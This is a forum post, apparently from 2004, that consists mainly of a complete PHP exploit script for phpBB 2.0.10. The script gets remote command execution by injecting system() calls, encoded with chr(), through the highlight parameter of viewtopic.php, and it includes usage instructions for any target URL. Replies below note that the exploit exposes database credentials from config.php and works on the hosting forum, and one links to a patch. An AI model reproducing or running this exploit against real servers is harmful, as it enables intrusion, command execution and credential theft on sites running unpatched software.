Remote command execution exploit for phpBB 2.0.10 that makes use of a flaw in the viewtopic.php code.


#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;

if ($argv[4])
$proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>

--- Dont ask how to use it..... ;) ----

Ha Ha ha ...

lol @ you guys, when you run those exploits, you can see the dbname. dbadmin . dbhost from config.php file !

I dont think this is allowed heere ? Batty ?

Yes, the exploit is valid for this forum :-)

But here forum run as nobody. Still it will show content of php files, directory listing etc... If you run the forum as privilaged user (phpsuexe) anyone can hack the web site. It is very easy to patch this exploit

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

I am waiting for digit forum to update with v2.0.11 ! Guess thats the latest version !